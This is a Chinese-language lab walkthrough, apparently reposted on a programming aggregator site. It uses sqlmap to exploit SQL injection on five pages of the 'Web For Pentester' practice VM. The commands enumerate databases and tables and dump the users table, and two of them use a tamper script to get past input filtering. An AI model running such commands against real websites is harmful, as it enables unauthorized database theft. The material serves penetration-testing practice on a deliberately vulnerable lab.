sqlmap注入-Web For Pentester

sqlmap注入-Web For Pentester,第1张

概述sqlmap注入-Web For Pentester  一、要求 使用sqlmap注入,测试pentester的web页面漏洞 二、环境 Pentester网站,服务器ip地址为192.168.202.128   三、步骤 1.example1注入 a.查询当前数据库: [email protected]:~# sqlmap -u "http://192.168.202.128/sqli/exam

sqlmap注入-Web For Pentester

 一、要求

使用sqlmap注入,测试pentester的web页面漏洞

二、环境

Pentester网站,服务器ip地址为192.168.202.128

 

三、步骤 1.example1注入

a.查询当前数据库:

[email protected]:~# sqlmap -u "http://192.168.202.128/sqli/example1.PHP?

name=root" –dbs

 

b.查询数据库对应的表

[email protected]:~# sqlmap -u "http://192.168.202.128/sqli/example1.PHP?

name=root" -D exercises –tables

 

c.查询表内容

 

 

2.example2注入

a.查看example2当前数据库

[email protected]:~#sqlmap-u http://192.168.202.128/sqli/example2.php?

name=root –dbs出现报错,执行绕过脚本语句

[email protected]:~#:sqlmap -u 192.168.202.128/sqli/example2.PHP?

name=root--dbs --tamper=space2comment.py -v 

 

b.查看表信息

[email protected]:~#sqlmap-u http://192.168.202.128/sqli/example2.php?

name=root -D exercises --tables

 

c.查看表下内容

[email protected]:~#sqlmap-u http://192.168.202.128/sqli/example2.php?

name=root -D exercise -T users --dump

 

3.example3注入

a.查看example3当前数据库

[email protected]:~#sqlmap-u http://192.168.202.128/sqli/example3.php?

name=root –dbs出现报错,执行绕过脚本语句

[email protected]:~#:sqlmap -u 192.168.202.128/sqli/example3.PHP?

name=root--dbs --tamper=space2comment.py -v 

 

b.查看表信息

[email protected]:~#sqlmap-u http://192.168.202.128/sqli/example3.php?

name=root -D exercises --tables

 

c.查看表下内容

[email protected]:~#sqlmap-u http://192.168.202.128/sqli/example3.php?

name=root -D exercise -T users --dump

 

4.example4注入

(由网址http://192.168.202.128/sqli/example4.php?id=2可以看出example4为数字型注入)

a.查看数据库

[email protected]:~# sqlmap -u "http://192.168.202.128/sqli/example4.PHP?ID=2" --dbs

 

b.查看表信息

[email protected]:~# sqlmap -u "http://192.168.202.128/sqli/example4.PHP?ID=2" -D exercises --tables

 

c.查看表下内容

[email protected]:~# sqlmap -u "http://192.168.202.128/sqli/example4.PHP?ID=2" -D exercises -T users --dump

 

5.example5注入

(由网址http://192.168.202.128/sqli/example5.php?id=2可以看出example5为数字型注入)

a.查看当前数据库

[email protected]:~# sqlmap -u "http://192.168.202.128/sqli/example5.PHP?ID=2" --dbs

 

b.查看表信息

[email protected]:~# sqlmap -u "http://192.168.202.128/sqli/example5.PHP?ID=2" –D exercise  --tables

 

c.查看表下相关信息

[email protected]:~# sqlmap -u "http://192.168.202.128/sqli/example5.PHP?ID=2" –D exercise  -T users  --dump

 

总结

以上是内存溢出为你收集整理的sqlmap注入-Web For Pentester全部内容,希望文章能够帮你解决sqlmap注入-Web For Pentester所遇到的程序开发问题。

如果觉得内存溢出网站内容还不错,欢迎将内存溢出网站推荐给程序员好友。

欢迎分享,转载请注明来源:内存溢出

原文地址:https://54852.com/web/1056804.html

(0)
打赏 微信扫一扫微信扫一扫 支付宝扫一扫支付宝扫一扫
上一篇 2022-05-25
下一篇2022-05-25

发表评论

登录后才能评论

评论列表(0条)

    保存